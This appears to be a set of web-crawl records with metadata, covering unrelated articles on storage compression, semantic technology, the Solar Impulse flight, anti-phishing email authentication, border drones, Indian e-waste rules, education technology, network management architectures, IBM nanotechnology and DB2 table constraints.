Block data compression frees up valuable storage capacity with minimal performance overhead. In contrast to deduplication, compression applies to all data, resulting in capacity savings of up to 50 percent. | <urn:uuid:277c7e20-cd0f-4593-8d1f-42f31dbed006> | CC-MAIN-2017-09 | https://www.emc.com/corporate/glossary/block-data-compression.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170404.1/warc/CC-MAIN-20170219104610-00465-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.848727 | 149 | 2.78125 | 3 |
Semantic technologies don't refer to a single technology, but rather to a wide variety of tools and technologies that have to do with meaning. Some focus on structure, some on text, and some on intelligence. Understanding what sub-categories are out there can help you determine when to use each.
Semantic Web vs. Semantic Technologies—much of the content on this site is about the Semantic Web, but it's only one kind of semantic technology. This lesson outlines the others and how they relate to the Semantic Web.
Semantic Search and the Semantic Web—semantic search is an increasingly hot topic, and with the Google Knowledge Graph it has become intimately related to the Semantic Web.
NLP and the Semantic Web—natural language processing and text analytic technologies can be powerfully combined with Semantic Web technologies.
6. Expecting people to behave like computers
Cause: Software developers expect that computers will follow their instructions exactly. If a computer seems to make a mistake, it’s because the instructions were wrong.
Resulting bad habit: Programmers can forget that humans don’t always follow instructions exactly (or at all), that they don’t always act (or think) logically and that they have things called “feelings.”
Quotes: "When programming, the machine (usually) does your bidding and executes whatever instructions you give to it. This doesn’t work as well with people…." Matt Drozdzynski
"Having to explain what a logical fallacy is, first, everytime someone says something completely wrong gets frustrating fast." SnOrfus
"The mental separation between logic and feeling is profound." Kevin Beckford | <urn:uuid:8db998e9-a2b3-4a47-abe4-e9ded159216a> | CC-MAIN-2017-09 | http://www.cio.com/article/2368848/developer/131287-0-1-2-Go-8-bad-habits-you-can-blame-on-programming.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171932.64/warc/CC-MAIN-20170219104611-00041-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.953666 | 176 | 2.84375 | 3 |
Credit: Martyn Williams
The Solar Impulse plane takes off from Moffett Field in Mountain View, Calif.
A one-of-a-kind aircraft powered solely by solar energy took to the skies above Silicon Valley early Friday morning on the first leg of a planned trip across the U.S.
The aircraft, called Solar Impulse, has the wingspan of a jumbo jet but weighs the same as a small passenger car and can theoretically fly forever.
At a little after 6 a.m., in front of a small crowd of spectators and a row of media cameras, the propellers on the aircraft revved and it began to move along the runway at Moffett Field in Mountain View. Within a few seconds it was airborne, climbing slowly away from its home for the last two months and, the team hopes, into another page of aviation history.
"In terms of today's flight, it's a very big contrast," Bertrand Piccard, pilot of the Solar Impulse, told reporters about an hour before takeoff. "On one side, we have to be very precise, it's an aeronautical first. We have to coordinate with the FAA, with air-traffic control, so there is a hard workload for the pilot. On the other side, it's complete freedom because we have no fuel on board. It's completely solar powered so theoretically the plane can fly forever. We don't need to refuel."
The secret to its light weight is a fuselage made from carbon fiber sheets three times lighter than paper. The solar cells that cover the tops of its expansive wings are thin, at just 135 microns, and it makes incredibly efficient use of the power it generates. Losses in the plane's motors amount to roughly 6 percent, versus around 70 percent in conventional motors, according to the project team.
Solar Impulse has already set several aviation milestones in Europe, including the first ever solar-powered night flight in 2010, the first international solar flight in 2011 and the first intercontinental solar flight in 2012. It also holds five world records, including one for duration: an impressive 26 hours, 10 minutes and 19 seconds.
The journey that began on Friday is scheduled to end in New York sometime in July. The first leg, at a pace equivalent to about 70 kilometers per hour, takes it from Moffett Field in Silicon Valley to Phoenix, Arizona, where it is scheduled to land at around 1 a.m. Saturday morning. Further flights will go to Dallas, St. Louis, Washington D.C., and New York.
The trip isn't about speed. After all, it would be quicker to drive to Phoenix than fly in Solar Impulse.
"We're the first airplane to be able to fly day and night on solar power, so it's a fabulous way to promote clean technology, to show what our world could do if we were really applying these technologies everywhere" said Piccard. "We have to understand, the technologies we have on board, if they were used everywhere including on the ground, they could help our world divide by two energy consumption."
Piccard, who previously completed an around-the-world flight in a hot air balloon, is sharing cockpit duty with Andre Borschberg, a former Swiss Air Force pilot and graduate of MIT. The two will be piloting the different legs of the journey between them.
By the numbers, the Solar Impulse has a 63 meter wingspan, is 22 meters long and just over 6 meters high. It weighs 1,600 kilograms and its four engines are powered by batteries that are charged by 11,628 solar cells. Its take off speed is a fairly leisurely 44 kilometers per hour and its cruising altitude is 8,500 meters, or 27,900 feet.
Martyn Williams covers mobile telecoms, Silicon Valley and general technology breaking news for The IDG News Service. Follow Martyn on Twitter at @martyn_williams. Martyn's e-mail address is email@example.com | <urn:uuid:ea0c8824-cdfb-4724-884c-430e962de78f> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2165962/data-center/solar-powered-plane-takes-off-on-flight-across-us.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174154.34/warc/CC-MAIN-20170219104614-00393-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.957176 | 825 | 2.796875 | 3 |
Protect your customers from phishing attacks that impersonate your organization
What Is Consumer Phishing?
In a phishing attack, a criminal sends a large number of consumers a deceptive email appearing to come from a respected brand — typically a financial service provider or an email service provider.
The email uses social engineering techniques to attempt to mislead the recipients into visiting a web page that appears to belong to the impersonated brand, where the user will be asked to enter her username and password — and sometimes other information as well. Having stolen this information, the criminal now controls the victim's account.
A good example of a large-scale consumer phishing attack is the recent attack targeting customers of GoDaddy.
How Consumer Phishing Works
Most phishing campaigns involve an attacker masquerading as a trusted brand, both in an email sent to the intended victims and using a website looking much like the website of the impersonated brand. The phisher commonly uses email spoofing to assume the identity of the brand he wishes to impersonate. In terms of the email and website content, phishers use copied logos and phrases associated with the brand to look credible.
Most consumers think that phishing is limited to impersonation of financial institutions, but as the black market value of stolen email credentials is going up, attackers are targeting more industries.
Cyber criminals abuse brand trust, using your brand name as a disguise to trick your customers into opening their malicious emails.
Traditional Defenses Identify Bad URLs
Traditional phishing countermeasures are based on rapidly identifying malicious websites — the phishing websites — and then scanning emails for hyperlinks pointing to these pages. To circumvent these countermeasures, phishers use smaller batches of phishing emails, each one of which uses distinct hyperlinks.
Often, legitimate services, such as link shortening services, are used by the phishers to make detection more difficult. The fact that the attacks constantly change makes it difficult for traditional filters to do a good job.
The Solution: Agari Customer Protect
Agari Customer Protect stops phishing attacks by ensuring that every email your customers receive claiming to be from you will actually be from you.
Agari Customer Protect analyzes email claiming to be from your domains that is sent to 3 billion mailboxes across the world's largest cloud email providers, including Google, Microsoft and Yahoo. Based on that data, Agari creates a model of legitimate email behavior for your organization. Then, that model is published via the DMARC standard and used to block all unauthorized email from reaching your customers' inboxes.
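For background (a detail not spelled out in the Agari material above): a DMARC policy is published as a DNS TXT record under the _dmarc label of the sending domain. A minimal, hypothetical record might look like this:

```
_dmarc.example.com.  IN  TXT  "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com"
```

Receiving mail systems that honor DMARC check whether a message passes SPF or DKIM alignment for the domain; with p=reject, unauthorized mail is refused outright, and aggregate reports are sent to the rua address.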
UAV missions boost tech presence on border
- By Alice Lipowicz
- Dec 12, 2008
A Predator B unmanned aerial vehicle will begin its first surveillance flights over the border between the United States and Canada in early February, U.S. Customs and Border Protection (CBP) officials said.
The test flights are part of a plan to link aerial imagery and data with a network of marine and ground sensors and other technologies along the border, they added.
Officials said the agency has been flying UAVs over the border with Mexico since 2005 to augment data collected by sensors and other technologies. They had announced Predator B flights over the Canadian border as part of a test program nearly two years ago, but they only recently completed negotiations with the Federal Aviation Administration and other entities to obtain the necessary approvals, Juan Munoz Torres, a CBP spokesman, said Dec. 11.
Predators are capable of flying 260 miles per hour for more than 18 hours at altitudes of 50,000 feet. The new Predator B will operate out of Grand Forks, N.D., and carry radar, infrared camera, video camera and communications equipment.
In March, CBP officials said they were refining a security strategy for the northern border and intended to demonstrate an integrated air, land and marine solution. Congress included $20 million for a northern border security demonstration project in the fiscal 2009 budget.
Alice Lipowicz is a staff writer covering government 2.0, homeland security and other IT policies for Federal Computer Week. | <urn:uuid:6867391a-aee5-46ac-a9fa-543623b07607> | CC-MAIN-2017-09 | https://fcw.com/articles/2008/12/12/uav-missions-boost-tech-presence-on-border.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172649.58/warc/CC-MAIN-20170219104612-00565-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.92395 | 325 | 2.5625 | 3 |
Another part of the world is stepping forward to tackle the electronic waste problem. This time it’s New Delhi in India, which has begun enforcing e-waste management requirements as of the first of May.
The Central Pollution Control Board (“CPCB”) which is a division of The Ministry of Environment and Forests that was formed back in 1974, has issued guidelines that require manufacturers and retailers to accept, free of charge, e-waste from consumers and then re-sell, recycle, or properly dispose of those items.
Specifically, the law labels many types of electronics as hazardous materials, putting them under the Hazardous Waste Management Division (“HWMD”) of the CPCB. Manufacturers are required to submit collection and recycling plans to the HWMD, with most having done so in advance of the rules taking effect at the first of the month. | <urn:uuid:de16385e-4df6-46cf-ac6b-ad124fb53d00> | CC-MAIN-2017-09 | http://anythingit.com/blog/2012/05/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00509-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.953442 | 185 | 2.53125 | 3 |
How technology can reinvigorate the education system
The path to a global No. 1 ranking in education requires technology
President Barack Obama set a goal of making the United States first in the world in post-secondary academic degrees by 2020, and Jim Shelton says technology is what will get us there.
- By Alice Lipowicz
- Oct 07, 2010
Named assistant deputy secretary for technology at the Education Department’s Office of Innovation and Improvement in April 2009, Shelton is in charge of grant-making and educational technology strategy at the department. He also coordinates Education's technology efforts with other federal and state agencies.
Previously, he was education program director at the Bill and Melinda Gates Foundation, where he spurred investments in next-generation models of learning. He has a bachelor's degree in computer science from Morehouse College and a master's degree in education and master's degree in business administration from Stanford University. He began his career in computer system development and became a senior consultant at McKinsey and Co. He also co-founded an educational company, worked on education reform issues for New York City and launched a private nonprofit venture capital fund for education.
At the recent Gov 2.0 Summit in Washington, Shelton talked about how customized software for instruction is being used to try to reduce the teacher/student ratio to as close to 1-to-1 as possible. With that ratio down to 15-to-1 now — from 27-to-1 in 1970 — he said the United States is unlikely to see more improvements in the classroom without technology.
He also noted that collecting and analyzing massive amounts of data is taking the guesswork out of understanding how students learn and what teaching methods work best. Using adaptive algorithms, we have the ability to personalize education. And the availability of low-cost devices, broadband access and near-universal connectivity are further driving improvements in education.
Shelton recently spoke with reporter Alice Lipowicz about technology, education and the challenges inherent in his position. The interview has been edited for style, clarity and length.
FCW: What’s the role of the Office of Innovation and Improvement?
Shelton: We do a lot of work with demonstration grants for teacher preparedness, charter schools and the investment innovation fund. We want to stimulate the identification of solutions, drive best practices, and support the ecosystem of research and development.
We define innovation as a solution that is significantly better than the status quo. Technology is going to be a driver for educational innovations as we move forward.
FCW: Building on what you said at the Gov 2.0 Summit, what more can you tell us about how technology is being used to improve education?
Shelton: Technology is being used to help students read and learn better, to connect teachers to resources, and as a platform for research.
No. 1, there is an opportunity to use technology as a support for student assessments. We are using that technology to make informed decisions. Kids can take tests or use learning software online that determines where they are in learning. The districts can buy that software.
Second, we want to use technology to make it easier for teachers to connect to peers and experts. You see how easy it is for students to connect. It should be easy for teachers to go online to meet their needs.
Right now, there is no good technology to help teachers and students personalize instruction. Some of the platforms will be free; others will be provided by states and school districts.
The Gov 2.0 Summit was a great opportunity to hear about the interesting work going on at government agencies and see the available solutions and tools. Some of the Web 2.0 developers have not thought about applying their tools to education yet.
FCW: What can you tell us about the department’s National Education Technology Plan?
Shelton: It’s a federal strategy not only for the department but for the country. It is a blueprint. As for implementing it, part of the responsibility is under my office. We coordinate the IT aspects.
A lot of our work is about coordination and understanding the vision. We work with the White House Office of Science and Technology Policy, Federal Communications Commission, and also with the National Science Foundation and the Defense Department. Technology is deeply embedded in what we do.
We work with the FCC on the E-Rate program, [which funds school and library broadband access through the Universal Service fee charged to companies that provide telecommunications services]. We work on education technology related to the communities, on [science, technology, engineering and math] education programs and professional development.
The question is: How quickly will states and districts move to IT solutions for their problems? What are the top-priority solutions?
Some of this is already happening. California has a network of teachers sharing information. Through technology, students will continue at home and organizations can keep track of performance.
A number of communities have embraced the one-to-one computing idea — one laptop per student — including communities in Maine, Vermont and Virginia. Some folks are pushing the envelope with work on devices and phones. Houghton Mifflin is trying out a large pilot project for teaching with iPads.
FCW: What are the greatest challenges of your position?
Shelton: The hardest part is getting people to take a risk from the current way to the future. They can see the benefits, but they get nervous about making a change. I wind up talking to a lot of folks, both on the demand side with states and school districts and with vendors on the supply side.
We are in an environment where we have to do more and be more efficient. Money is tight and will get tighter.
Technology has turned out to be a way to help with the problem. We can do it in education.
The risks are that if you try something very difficult, it might not work. People are becoming risk-averse.… There needs to be a form of accountability so that people are not penalized for taking risks.
Alice Lipowicz is a staff writer covering government 2.0, homeland security and other IT policies for Federal Computer Week. | <urn:uuid:0a159c37-70e2-46da-9686-99557e05dd3c> | CC-MAIN-2017-09 | https://fcw.com/articles/2010/10/11/feat-jim-shelton-education-qanda.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00509-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.958444 | 1,262 | 2.53125 | 3 |
Human babies learn words through repetition, obviously, but also by associating words with shapes (in the case of objects). Curious whether dogs learned the names of objects in the same way as people, some researchers at the University of Lincoln in the United Kingdom put a five-year-old Border Collie -- reputedly the world's smartest breed of dog -- through its language-recognition paces. What they discovered was that dogs (or at least this dog) used a different technique than the "shape bias" employed by humans to learn the words associated with objects. From the online scientific research journal Plos One:
Two experiments showed that when briefly familiarized with word-object mappings the dog did not generalize object names to object shape but to object size. [Another] experiment showed that when familiarized with a word-object mapping for a longer period of time the dog tended to generalize the word to objects with the same texture. These results show that the dog tested did not display human-like word comprehension, but word generalization and word reference development of a qualitatively different nature compared to humans.
As to why that is, the researchers speculated that "the evolutionary history of our sensory systems – with vision taking priority over other sensory systems – seems to have primed humans to take into account visual object shape in object naming tasks." Whereas dogs (and many other animals) rely much more strongly on their senses of smell and hearing to make sense of the world. Of course, it's incumbent upon humans as partners and guardians of dogs to also understand how our canine friends communicate with us and each other. Here's one article about understanding dog "talk." | <urn:uuid:b68b187e-aa8e-4e6d-a9c4-3eb7115898f5> | CC-MAIN-2017-09 | http://www.itworld.com/article/2718271/enterprise-software/how-dogs-learn-names-of-new-objects.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170823.55/warc/CC-MAIN-20170219104610-00382-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.95224 | 340 | 3.328125 | 3 |
For years, Microsoft has been delivering speedy and accurate Bing results with experimental servers called Project Catapult, which have now received an architectural upgrade.
The Catapult servers use reprogrammable chips called FPGAs (field programmable gate arrays), which are central to delivering better Bing results. FPGAs can quickly score, filter, rank, and measure the relevancy of text and image queries on Bing.
Microsoft has now redesigned the original Catapult server, which is used to investigate the role of FPGAs in speeding up servers. The proposed Catapult v2 design is more flexible in circumventing traditional data-center structures for machine learning and expands the role of FPGAs as accelerators.
Microsoft presented the Catapult v2 design for the first time earlier this month at the Scaled Machine Learning conference in Stanford, California.
Microsoft's data centers drive services like Cortana and Skype Translator, and the company is constantly looking to upgrade server performance. Microsoft is also working with Intel to implement silicon photonics, in which fiber optics will replace copper wires for faster communications between servers in data centers.
Catapult v2 expands the availability of FPGAs, allowing them to be hooked up to a larger number of computing resources. The FPGAs are connected to DRAM, the CPU, and network switches.
The FPGAs can accelerate local applications, or be a processing resource in large-scale, deep-learning models. Much like with Bing, the FPGAs can be involved in scoring results and training of deep-learning models.
The new model is a big improvement over the original Catapult model, in which FPGAs were limited to a smaller network within servers.
The Catapult v2 design can be used for cloud-based image recognition, natural language processing, and other tasks typically associated with machine learning.
Catapult v2 could also provide a blueprint for using FPGAs in machine learning installations. Many machine learning models are driven by GPUs, but the role of FPGAs is less clear. Baidu has also used FPGAs in data centers for deep learning.
FPGAs can quickly deliver deep-learning results, but they can be notoriously power hungry if not programmed correctly. They can be reprogrammed to execute specific tasks, but that also makes them one dimensional. GPUs are more flexible and can handle several calculations, but FPGAs can be faster at given tasks.
Many large companies are showing interest in FPGAs. Intel earlier this year completed the US$16.7 billion acquisition of Altera, an FPGA vendor. Intel will put Altera FPGAs in cars, servers, robots, drones, and other devices.
Outside of Microsoft, a Catapult server, used for machine learning, is installed at the Texas Advanced Computing Center at the University of Texas, Austin. The system is small, with 32 two-socket Intel Xeon servers, which are packed with 64GB of memory, and an Altera Stratix V D5 FPGA with its own 8GB DDR3 memory cache. | <urn:uuid:016bf606-7ccf-4f03-ac20-5a96aac2d129> | CC-MAIN-2017-09 | http://www.itnews.com/article/3113496/microsofts-new-catapult-v2-server-design-is-targeted-at-ai.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00082-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.940585 | 628 | 2.6875 | 3 |
Understanding the Classic Network Management Architectures
Our previous tutorial began our series on enterprise network management, and looked at the five functional areas of network management defined by the ISO as part of its research into the seven-layer Open Systems Interconnection (OSI) model. To review, these five areas are:
- fault management
- accounting management
- configuration management
- performance management
- security management
But let’s take a step back for a moment, and recognize that the typical enterprise network manager has many subsystems that he or she is responsible for. You are likely dealing with some type of centralized or distributed computing system, local and wide area data networks (LANs and WANs), Internet access, and possibly a video conferencing network. You may also have deployed integrated applications, such as VoIP, call centers or unified messaging, which depend on a mix of voice and data elements. There are likely desktop workstations, perhaps running under Windows, Mac OS and/or UNIX/Linux, plus all of the applications that run on those workstations. In addition, you probably have some backup systems, protecting the data storage, power, and possibly WAN access, which are also part of the mix. So when we consider these five network management areas, we need to discuss them in the context of the integrated enterprise network, not as a singular function.
If we look at this enterprise challenge from a historical perspective, the network management business of a decade or two ago was dominated by two industries: the mainframe computer vendors and the telecommunications providers. You may have heard of IBM’s NetView, Digital Equipment Corporation’s Enterprise Management Architecture (EMA), and AT&T’s Unified Network Management Architecture (UNMA), that fit the mold of a centralized management system that would allow input from distributed elements such as a minicomputer (in DEC’s case) or a PBX (in AT&T’s case). But as networking architectures became more distributed, network management systems evolved as well. Instead of a centralized system, where all of system performance information was associated with a large system, such as the mainframe or a PBX, distributed models, based upon client/server networking were developed.
With this shift toward distributed computing, the 1990s also brought about the development of two different architectures and protocols for distributed systems management. First, the ITU-T furthered the ISO's network management efforts, publishing a network management framework defined in ITU-T document X.700. Also defined was a network management protocol that would facilitate communication between the managed elements and the management console, called the Common Management Information Protocol, or CMIP, which is defined in other X.700-series recommendations (of which there are many). Management of telecommunications networks in particular is addressed in an architecture called the Telecommunications Management Network, or TMN, which is defined in the M.3000-series of recommendations (see http://www.itu.int/rec/T-REC-M.3010-200002-I/en). This architecture provides a framework for connecting dissimilar systems and networks, and allows managed elements from different manufacturers to be incorporated into a single management system. This architecture has been most popular with the telcos, likely owing to their allegiance to the ITU-T, and its emphasis on telephony-related research and standards.
The 1990s also brought about the Internet surge, and with that came a friendly rivalry between some of the incumbent standards bodies (such as the ISO and ITU-T) that many considered slow and bureaucratic, and the Internet Engineering Task Force (IETF), which was more likely to be on the cutting edge and therefore quicker to respond to new innovations. Also at that time, the networking community was patiently waiting for computing and communications vendors to embrace the seven-layer OSI model in their products, and after a few years, grew impatient. That environment gave rise to the development of the IETF's own network management architecture, called the Internet Network Management Framework, and an accompanying protocol, the Simple Network Management Protocol, or SNMP. This network management system embeds simple agents inside networking devices, such as workstations, gateways and servers, which report operational status and exception conditions to the network manager, which provides oversight for the enterprise or a portion of that enterprise. Communication between agents and manager is handled by the SNMP. Further work defined a concept called RMON, short for Remote Monitoring, documented in RFC 2819, which allows agents on remote networking segments to report back to a centralized manager. Sun Microsystems' Solstice Enterprise Manager (formerly named SunNet Manager) and Hewlett-Packard's OpenView were two systems developed during this era that relied heavily on SNMP and RMON technology.
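To make the agent-and-manager interaction concrete, here is a small illustration using the open-source Net-SNMP command-line tools; the host names and the "public" community string are placeholders rather than details from the original article:

```
# Ask an agent for its system description and uptime (SNMPv2c)
snmpget -v2c -c public router1.example.com sysDescr.0 sysUpTime.0

# Walk the interface table to read per-port descriptions
snmpwalk -v2c -c public switch1.example.com ifDescr
```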
But as you might expect, Microsoft is always up for a good challenge (especially when the names IBM and Sun are part of the discussion), and developed a network management platform of its own called the Systems Management Server. Currently in its 2003 release (see http://www.microsoft.com/smserver/evaluation/default.mspx), this package includes components for software inventory, software update compliance testing, publishing and integrating new applications, assessments of system vulnerability and security, and more.
But no matter how large your enterprise, or how broad the set of existing network management systems you have deployed to support mainframe, WAN, or LAN environments, it's not likely that a single system can adequately manage your entire networking infrastructure. And the reason is pretty simple – traditional network management focuses on the systems, making sure that disk storage is adequate, the CPU is not over-utilized, a WAN link has sufficient capacity, or the number of collisions on the Ethernet LAN is not excessive. But the other key area is the domain of the end users and their applications – which can run the spectrum from a server-resident database to desktop video conferencing. In other words, performance management is a crucial factor, since it directly impacts the productivity of your end users and occurs in real time.
Our next tutorial will drill down a little deeper, and consider some of the real time management challenges that occur at each layer of the OSI Reference Model.
Copyright Acknowledgement: ©2009 DigiNet Corporation, All Rights Reserved
Mark A. Miller, P.E. is President of DigiNet Corporation, a Denver-based consulting engineering firm. He is the author of many books on networking technologies, including Voice over IP Technologies, and Internet Technologies Handbook, both published by John Wiley & Sons. | <urn:uuid:98c16fad-8737-49fc-be07-dda6803039d6> | CC-MAIN-2017-09 | http://www.enterprisenetworkingplanet.com/print/netsp/article.php/3819086/Understanding-the-Classic--Network-Management-Architectures.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00258-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.937495 | 1,362 | 2.625 | 3 |
Thanks to the finite speed of light, which places a fundamental minimum on the time it takes an electrical signal to travel a specified distance, improvements in computer processor technology require devices to become smaller and smaller. But as individual components (for instance, transistors) approach the size of the atoms that compose them, progress becomes increasingly difficult. In what may be achievements that help keep Moore’s Law alive, however, IBM has announced new developments in several nanotechnology pursuits that could keep the miniaturization train moving forward a little longer.
At this year’s IEEE International Electron Devices Meeting earlier this month, IBM introduced three prototype devices applying the company’s research in racetrack memory, graphene and carbon nanotubes. IBM’s motivation for these pursuits arise, in part at least, from the growing difficulty of gaining increased device performance through “simple” shrinks of silicon manufacturing process technologies. For years, scaling down processors was sufficient to increase performance, decrease power consumption and (of course) reduce size. But ultimately, this driver for Moore’s Law will run out of steam when device sizes reach (somewhere near) the size of the atoms that constitute them.
“For more than 50 years, computer processors have increased in power and shrunk in size at a tremendous rate. However, today’s chip designers are hitting physical limitations with Moore’s Law, halting the pace of product innovation from scaling alone,” said the company in a press release earlier this week (“Made in IBM Labs: Researchers Demonstrate Future of Computing with Graphene, Racetrack and Carbon Nanotube Breakthroughs”).
Other companies have illustrated the growing need to look beyond just making transistors smaller; Intel, for instance, announced earlier this year its new FinFET technology (“Intel Increases Transistor Speed by Building Upward”), which uses three-dimensional structures to pack more transistors into less space on a chip. Although Intel’s approach is beneficial and even somewhat novel, it is not necessarily a conceptual breakthrough (in the sense that it is still a matter of packing more semiconductor-based transistors into less area). Ultimately, keeping Moore’s Law alive will require more-revolutionary technologies.
IBM is trying to fit this bill by demonstrating working prototypes of its technologies. The company notes, “With virtually all electronic equipment today built on complementary-symmetry metal–oxide–semiconductor (CMOS) technology, there is an urgent need for new materials and circuit architecture designs compatible with this engineering process as the technology industry nears physical scalability limits of the silicon transistor.” One of the critical successes of the company’s latest developments is their successful integration on 200mm wafers, opening the door to larger scale use in conjunction with existing semiconductor devices.
Graphene, a polycyclic structure built exclusively of carbon atoms (note the similarity to the name of the more commonly known material graphite), has been touted as a “miracle material” owing to its remarkable features: it is extremely strong and highly conductive, and graphene sheets are just one carbon atom thick. A BBC report on the material (“Is graphene a miracle material?”) identifies graphene as the strongest and most conductive substance known to man, having a range of potential applications that make it the metaphorical “plastic” of the 21st century.
IBM, following on the heels of MIT’s creation of a graphene frequency multiplier (“Graphene works as a frequency multiplier”), has integrated a CMOS-compatible version of this device on a 200mm wafer. (A frequency multiplier is a device that outputs a signal whose frequency is an integral multiple of the input signal’s frequency.) According to the company, the device operates at up to 5GHz and promises stability in adverse conditions, such as high-temperature and high-radiation environments. IBM stated that its prototype device is stable up to 200 degrees Celsius. “Instead of trying to deposit gate dielectric on an inert graphene surface, the researchers developed a novel embedded gate structure that enables high device yield on a 200mm wafer,” said the company in its press release. The new development—if commercially and technically feasible in advanced components—could enable higher-frequency devices and more-powerful communications systems.
In another step forward, IBM has taken its racetrack memory concept—which the company first developed in 2002—and applied it to CMOS devices on 200mm wafers. So-called racetrack memory uses nanowires to hold “strings” of data. According to an IBM article (“Racetrack Memory”), the concepts originator, Stuart Parkin, “conceived of a device consisting of a city of skyscrapers—each one only hundreds of atoms wide—of magnetic material, with each floor of each skyscraper containing a single bit of data. The data is shot up and down the skyscrapers—almost like a supersonic elevator—by using special currents of electrons. . . These currents are generated by a transistor connected to the bottom of each skyscraper.”
This design allows a transistor to store many bits of data rather than just one, greatly expanding the potential capacity of memory devices. IBM’s recent prototype is able to perform both read and write functions and consists of 256 planar racetracks. The company believes this breakthrough will enable further progress through creation of three-dimensional racetrack structures that increase density and reliability. Racetrack memory’s unique characteristics result from its combination of the advantages of both magnetic hard drives and solid-state memory devices, and with further development, it offers the potential of ameliorating the growing concern over data storage.
IBM’s third announced prototype uses carbon nanotubes to implement a transistor with channel lengths below 10nm. Carbon nanotubes are closely related to graphene—they are essentially the cylindrical analog of graphene sheets, being composed of conjoined hexagonal rings of carbon atoms. Nanotubes are like tiny wires, and they can be manipulated (using, for instance, an atomic force microscope) to adjust both their shape and behavior.
Although they are extremely strong, like graphene, carbon nanotubes vary in their electrical properties, ranging from semiconductor-like materials to metal-like materials. The company believes that components similar to its prototype will meet the need for “transistors with a channel length below 10 nm, a length scale at which conventional silicon technology will have extreme difficulty performing even with new advanced device architectures.”
How Far Can These Technologies Go?
Periodically, the Data Center Journal reports on new technologies that may be the foundation of future breakthroughs that affect the data center and IT as a whole. The potential of new research and prototypes, like those of IBM discussed above, can be exciting, but some perspective is always needed. For one reason or another, many innovations fall by the wayside, whether for economic, technical or practical reasons. Even the coolest technology, if it can’t be commercialized, will probably fall into the dustbin of history. Part of the excitement of following research progress, however, is seeing which unique concepts are able to move from “gee, that’s a neat idea” to “wow, everybody is using this now.”
So, will IBM’s latest prototypes be the foundation of a new breed of technologies that revolutionize the computing world? The safe bet is “no” (going simply by the odds), but only time will tell. As conventional scaling of process technologies reaches its limit, the need for unique approaches to increasing processor performance will grow. We may even have to wait for Moore’s Law to begin sputtering a bit before technologies such as graphene and nanotubes become feasible. And at such a time, even some forgotten innovations may be given a second look. | <urn:uuid:5b8595c2-c8e0-4194-aac6-da17f817c749> | CC-MAIN-2017-09 | http://www.datacenterjournal.com/ibm-pushes-nanotechnology-frontiers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171416.74/warc/CC-MAIN-20170219104611-00430-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.931139 | 1,660 | 3.671875 | 4 |
- "Can't be nuthin'!" - The NOT NULL constraint
- "For singles only" - The unique constraint
- "We're number one!" - The primary key constraint
- "It's all relative" - The foreign key constraint
- "Check and check again" - The table check constraint
Constraints are used by DB2 for Linux, UNIX, and Windows (DB2 LUW) to enforce business rules for data. This article describes the following types of constraints:
- NOT NULL
- Unique
- Primary key
- Foreign key
- Table check
There is another type of constraint known as an informational constraint. Unlike the five constraint types listed above, an informational constraint is not enforced by the database manager, but it can be used by the SQL compiler to improve query performance. This article focuses on only the types of constraints in the list.
You can define one or more DB2 constraints when you create a new table, or you can define some of them by altering the table later. The CREATE TABLE statement is very complex. In fact, it is so complex that although only a small fraction of its options are used in constraint definitions, those options can themselves appear to be quite complex when viewed in a syntax diagram, as shown in Figure 1.
Figure 1. Partial syntax of the CREATE TABLE statement, showing clauses that are used in defining constraints
Constraints management can be simpler and more convenient when done through the DB2 Control Center.
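If you prefer to work from the command line, the following sketch shows a single CREATE TABLE statement that defines all five constraint types at once. All table, column, and constraint names here are invented for illustration; EMPLOYEE is the familiar SAMPLE database table, and the statement assumes its EMPNO primary key is in place.

```sql
CREATE TABLE project_task (
    task_id    INTEGER     NOT NULL,
    task_name  VARCHAR(40) NOT NULL,
    task_code  CHAR(3)     NOT NULL,
    empno      CHAR(6),
    CONSTRAINT task_pk  PRIMARY KEY (task_id),
    CONSTRAINT task_uq  UNIQUE (task_name, task_code),
    CONSTRAINT task_fk  FOREIGN KEY (empno)
                        REFERENCES employee (empno) ON DELETE SET NULL,
    CONSTRAINT task_ck  CHECK (task_code IN ('DSN', 'DEV', 'TST'))
);
```

Each of the named constraints above would then appear in the catalog views described next.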
Constraint definitions are associated with the database to which they apply, and they are stored in the database catalog, as shown in Table 1. You can query the database catalog to retrieve and inspect this information. You can do so directly from the command line (remember to establish a database connection first), or, again, you might find it more convenient to access some of this information through the DB2 Control Center.
The constraints that you create are handled like any other database objects. They are named, have an associated schema (creator ID), and in some cases can be dropped (deleted).
Figure 2. Partial syntax of the CREATE TABLE statement, showing clauses that are used in defining constraints (continued)
Table 1 shows constraints information in the database catalog. To run successfully, queries against the catalog require a database connection.
Table 1. Constraints information in the database catalog
| Catalog view | View column | Description | Query example |
| --- | --- | --- | --- |
| SYSCAT.CHECKS | | Contains a row for each table check constraint | db2 select constname, tabname, text from syscat.checks |
| SYSCAT.COLCHECKS | | Contains a row for each column that is referenced by a table check constraint | db2 select constname, tabname, colname, usage from syscat.colchecks |
